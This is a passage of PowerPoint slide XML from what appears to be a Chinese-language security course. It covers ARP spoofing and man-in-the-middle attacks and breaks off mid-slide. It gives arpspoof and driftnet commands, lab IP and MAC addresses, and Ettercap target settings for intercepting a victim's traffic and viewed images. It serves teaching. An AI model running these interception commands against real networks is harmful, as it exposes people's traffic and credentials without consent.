                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>~#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> eth0 –t IP1 IP2   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1285921-4579-629A-D762-B5157D664D24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314830" y="3677212"/>
            <a:ext cx="7874000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：192.168.77.2             ether   00:50:56:f4:5b:1b </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83517D3B-EDA6-7845-8DDA-B8433001F4D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314830" y="4387927"/>
            <a:ext cx="7874000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：192.168.77.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>133</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>         ether   00:0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>29</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>31</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>40</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>d5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F58CEDE8-E329-7265-088D-04F6C36F193A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314830" y="2976408"/>
            <a:ext cx="7874000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>   192.168.77.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>128</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>         ether   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>00:0c:29:39:20:27</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305F5CE5-2DFA-BE16-EBA0-B48A5EA3E81D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6282520" y="2193271"/>
            <a:ext cx="7874758" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>查看默认网关：routel | grep default</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15228274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895350"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>工具实时中间人攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1968500"/>
            <a:ext cx="11887200" cy="3451225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>是一款基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>地址欺骗的网络嗅探工具，主要适用于交换局域网络。借助</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>嗅探软件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>渗透测试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>人员可以检测网络内明文数据通讯的安全性，及时采取措施，避免敏感的用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>密码等数据以明文的方式进行传输</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="196886" y="3654780"/>
            <a:ext cx="6666667" cy="2838095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7113762" y="3482003"/>
            <a:ext cx="5035753" cy="2462213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Sniffing at startup:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是否启动网络嗅探</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>默认是启动的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Primary Interface:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置主要的网络接口。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Bridged sniffing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是否启动 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Bridged</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>嗅探</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>默认是关闭的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Bridged Interface:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>指定桥接接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>默认是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Local Loopback (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>本地回环接口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6378671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0872" y="1046631"/>
            <a:ext cx="8769753" cy="4398151"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E700D5A5-8078-9A71-36C7-C2C1243014F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="2566558"/>
            <a:ext cx="2866029" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>目标主机添加为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Target 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网关添加为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Traget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>在百度浏览图片</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{550B2EF8-EE84-F31A-32DD-554CB2B1332E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="286604" y="6051939"/>
            <a:ext cx="12050972" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>driftnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>开始监听目标主机浏览的信息：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>driftnet -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t> eth0 -d /home/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>bhl</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="508026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87350" y="953016"/>
            <a:ext cx="10515600" cy="1204912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>命令行模式</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="546100" y="3493562"/>
            <a:ext cx="11290300" cy="685088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>~#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
